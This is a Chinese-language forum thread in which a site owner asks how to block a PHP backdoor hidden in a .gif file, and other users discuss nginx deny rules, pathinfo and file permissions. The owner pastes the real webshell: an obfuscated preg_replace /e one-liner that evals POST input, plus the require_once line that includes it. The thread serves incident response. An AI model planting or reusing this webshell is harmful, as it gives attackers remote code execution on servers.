网站被传了后门,php 代码写在一个 gif 后缀的文件里面, nginx 怎么写 deny 规则

location ~ /attachments/.*\.(php|php5)?$ {
deny all;
}
http://drops.wooyun.org/tips/1323

@zur13l 这个是目录限制,我有的. 但是如果这目录里面有一个 gif 文件被植入了 php 代码,怎么禁止呢?

@ab 应该不能被执行吧？
你只对以.php 进行解析就好了。

@kn007 是对.php 解析的. 但是还是被执行了

@ab
0x05 需要解决的常见问题
0x06 Nginx 安全配置方案

应该是之前 pathinfo 的漏洞吧, 禁用 pathinfo 吧

@ab 装个安全狗扫下不是更简单嘛？

@lostsnow 这应该是禁用的吧?


location ~ [^/]\.php(/|$)
{
# comment try_files $uri =404; to enable pathinfo
try_files $uri =404;
fastcgi_pass unix:/tmp/php-cgi.sock;
fastcgi_index index.php;
include fastcgi.conf;
#include pathinfo.conf;
}

@ab http://www.laruence.com/2010/05/20/1495.html

@lostsnow fix_pathinfo=0 是关闭的

@ab 上传个样本和被执行的请求吧。

@kn007

<?php require_once (dirname(__FILE__) . "/../../templets/3vpk/images/mood/ico-mood-16.gif"); ?>

ico-mood-16.gif 修改为 PHP 以后是这样的:

<?php ($tagdilst = $_POST['good']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($tagdilst)', 'add'); ?>

有没有人能解释一下,为什么.gif 文件会被 php 执行呀?

@kongkongyzt include/require 某个文件，如果文件有<?php ?>就当成 PHP 来执行了

@ab
这行代码是哪个文件里的：
<?php require_once (dirname(__FILE__) . "/../../templets/3vpk/images/mood/ico-mood-16.gif"); ?>
.gif 文件本身没有被执行，而是引入该 gif 的文件被 php 执行。
你禁止 templets 目录不会有任何作用。

建议按这样两个原则：
1 有 php 执行权限的目录，不允许 web 账号（ php-fcgi 进程）的写入权限
2 有 web 账户有写入权限的目录（如模板目录，附件上传目录），不允许 php 执行权限。

@ab 你只是看到里面有 PHP 代码，还是直接访问这个 gif 会被当成 php 执行
17 楼的 require_once 是哪个文件里面的

<?php require_once (dirname(__FILE__) . "/../../templets/3vpk/images/mood/ico-mood-16.gif"); ?>
这里只是用了读取权限

http://www.tntsec.com/439.html
从入侵谈防御之“黑不掉”的网站，论网站攻防，公测版

@ab include/require 肯定就被执行了啊。。。跟目录和什么文件类型没关系。。。

@ab 如果 ico-mood-16.gif 是本来就会有的文件，那么限制修改权限，不归所有。如果 ico-mood-16.gif 本来就是不能有的。那么查出他为什么会被上传。如果其所在目录是不需更改的，限定它。